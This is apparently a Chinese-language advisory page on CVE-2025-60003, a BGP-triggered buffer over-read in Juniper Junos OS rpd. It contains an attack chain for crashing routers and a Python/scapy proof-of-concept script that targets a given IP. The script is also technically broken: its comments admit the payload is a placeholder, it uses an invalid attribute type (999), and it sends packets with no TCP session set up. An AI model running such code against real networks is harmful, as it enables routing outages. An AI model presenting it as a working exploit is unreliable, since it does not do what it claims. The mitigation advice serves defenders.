CVE-2025-60003: Juniper Junos OS rpd缓冲区过度读取漏洞

漏洞信息

漏洞编号

CVE-2025-60003

漏洞类型

缓冲区过度读取

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Juniper Networks Junos OS, Junos OS Evolved

漏洞概述

CVE-2025-60003是Juniper Networks Junos OS和Junos OS Evolved中路由协议守护进程(rpd)的一个高危缓冲区过度读取(Buffer Over-read)漏洞。CVSS评分7.5，属于高危级别。该漏洞允许未经认证的网络攻击者通过发送特制的BGP更新消息，导致rpd进程崩溃并重启，从而造成拒绝服务(DoS)。攻击者无需任何认证凭证或用户交互即可发起攻击，攻击复杂度低，影响范围为可用性高。漏洞存在于BGP协议处理可选可传递属性的逻辑中，当设备尝试将接收到的信息转发给其他对等体时，会触发缓冲区过度读取，进而导致进程崩溃。该漏洞仅在BGP会话的一方或双方不支持4字节AS号时才会被触发。

技术细节

该漏洞根源在于Juniper Junos OS的rpd在处理BGP更新消息中的可选可传递属性(Optional Transitive Attributes)时存在边界检查缺陷。当受影响的Juniper设备作为BGP对等体接收到包含特定构造的可选可传递属性的BGP UPDATE消息时，如果该会话的一方或双方不支持4字节AS号能力(可通过show bgp neighbor命令检查4 byte AS状态)，rpd在尝试将这些属性转发给其他BGP邻居的过程中会发生缓冲区过度读取。具体来说，当rpd处理这些属性时，读取操作超出了分配的缓冲区边界，可能访问未授权的内存区域，导致进程崩溃。由于BGP是核心路由协议，rpd的崩溃会导致路由信息丢失和路由收敛中断，对网络可用性造成严重影响。攻击者只需建立BGP会话并发送恶意构造的UPDATE消息即可触发漏洞，无需特殊权限。

攻击链分析

STEP 1

步骤1

扫描目标网络，识别运行Juniper Junos OS且暴露BGP端口(179)的设备

STEP 2

步骤2

与目标Juniper设备建立BGP会话连接，协商会话参数

STEP 3

步骤3

构造包含特定可选可传递属性的恶意BGP UPDATE消息，确保会话一方或双方不支持4字节AS号

STEP 4

步骤4

向目标设备发送恶意BGP UPDATE消息，触发rpd进程中的缓冲区过度读取

STEP 5

步骤5

rpd进程崩溃并重启，导致路由中断，造成拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-60003 PoC - Juniper Junos OS rpd Buffer Over-read
# This PoC demonstrates sending a crafted BGP UPDATE with malicious optional transitive attributes
# Note: This is for authorized security testing only

from scapy.all import *
from scapy.contrib.bgp import *
import socket
import struct

def craft_bgp_open():
    """Craft BGP OPEN message for session establishment"""
    bgp_open = BGPOpen()
    bgp_open.version = 4
    bgp_open.my_as = 65000
    bgp_open.hold_time = 90
    bgp_open.bgp_id = IPAddr('192.168.1.100')
    
    # Add 4-byte AS capability (may be omitted to trigger vulnerability)
    cap_4byte = BGPCapability()
    cap_4byte.code = 65  # 4-byte AS number
    cap_4byte.value = struct.pack('!H', 65000)
    bgp_open.capabilities = [cap_4byte]
    
    return bgp_open

def craft_malicious_bgp_update():
    """Craft malicious BGP UPDATE with crafted optional transitive attributes
    This triggers buffer over-read in rpd when processing attributes
    """
    bgp_update = BGPUpdate()
    
    # Withdrawn routes
    bgp_update.withdrawn_routes = []
    
    # Path attributes with crafted optional transitive attribute
    # This specific attribute construction can trigger the buffer over-read
    path_attrs = []
    
    # ORIGIN attribute (well-known transitive)
    origin_attr = BGPPathAttr(flags=0x40, type=1, attr=[BGPAttrOrigin(0)])
    path_attrs.append(origin_attr)
    
    # AS_PATH attribute (well-known transitive)
    as_path = BGPAttrASPath(paths=[[(1, [65001, 65002])]])
    as_path_attr = BGPPathAttr(flags=0x40, type=2, attr=[as_path])
    path_attrs.append(as_path_attr)
    
    # NEXT_HOP attribute (well-known transitive)
    next_hop = BGPAttrNextHop('10.0.0.1')
    next_hop_attr = BGPPathAttr(flags=0x40, type=3, attr=[next_hop])
    path_attrs.append(next_hop_attr)
    
    # Crafted optional transitive attribute that triggers buffer over-read
    # This is a placeholder - actual exploitation requires specific byte patterns
    malicious_attr_data = b'\xaa\xbb\xcc\xdd' * 10  # Malicious pattern
    
    # Wrap in BGPPathAttr with optional transitive flag (flag=0x80)
    crafted_attr = BGPPathAttr()
    crafted_attr.flags = 0x80  # Optional + Transitive
    crafted_attr.type = 999  # Vendor-specific attribute type
    crafted_attr.attr = malicious_attr_data
    path_attrs.append(crafted_attr)
    
    bgp_update.path_attributes = path_attrs
    
    # NLRI (Network Layer Reachability Information)
    bgp_update.nlri = [IPNetwork('10.100.0.0/24')]
    
    return bgp_update

def send_bgp_poc(target_ip, asn=65000):
    """Send crafted BGP messages to trigger vulnerability"""
    print(f"[*] Starting CVE-2025-60003 PoC against {target_ip}")
    print(f"[*] Local ASN: {asn}")
    
    # Step 1: Send BGP OPEN message
    print("[*] Sending BGP OPEN message...")
    open_pkt = IP(dst=target_ip) / TCP(dport=179, sport=12345) / BGPL4Session() / craft_bgp_open()
    send(open_pkt, verbose=0)
    
    # Step 2: Send crafted BGP UPDATE with malicious attributes
    print("[*] Sending crafted BGP UPDATE with malicious optional transitive attributes...")
    update_pkt = IP(dst=target_ip) / TCP(dport=179, sport=12345) / BGPL4Session() / craft_malicious_bgp_update()
    send(update_pkt, verbose=0)
    
    print("[+] Packets sent. Target rpd may crash if vulnerable.")
    print("[!] Note: Actual exploitation requires specific attribute construction based on target version.")

if __name__ == '__main__':
    import sys
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-60003-poc.py <target_ip>")
        sys.exit(1)
    send_bgp_poc(sys.argv[1])

影响范围

Junos OS < 22.4R3-S8

Junos OS 23.2 < 23.2R2-S5

Junos OS 23.4 < 23.4R2-S6

Junos OS 24.2 < 24.2R2-S2

Junos OS 24.4 < 24.4R2

Junos OS Evolved < 22.4R3-S8-EVO

Junos OS Evolved 23.2 < 23.2R2-S5-EVO

Junos OS Evolved 23.4 < 23.4R2-S6-EVO

Junos OS Evolved 24.2 < 24.2R2-S2-EVO

Junos OS Evolved 24.4 < 24.4R2-EVO

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 使用ACL限制只有授权的BGP邻居可以建立BGP会话；2) 监控BGP会话状态，当发现rpd进程异常重启时及时告警；3) 考虑使用BGP路由策略过滤异常的路径属性；4) 如果业务允许，可以临时禁用BGP路由重分发功能。需要注意的是，这些措施只能降低风险，最根本的解决方案仍然是升级到官方修复版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-60003
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-60003
3 Details https://www.cvedetails.com/cve/CVE-2025-60003/
4 VulDB https://vuldb.com/cve/CVE-2025-60003
5 Link https://kb.juniper.net/JSA103166
6 Link https://supportportal.juniper.net/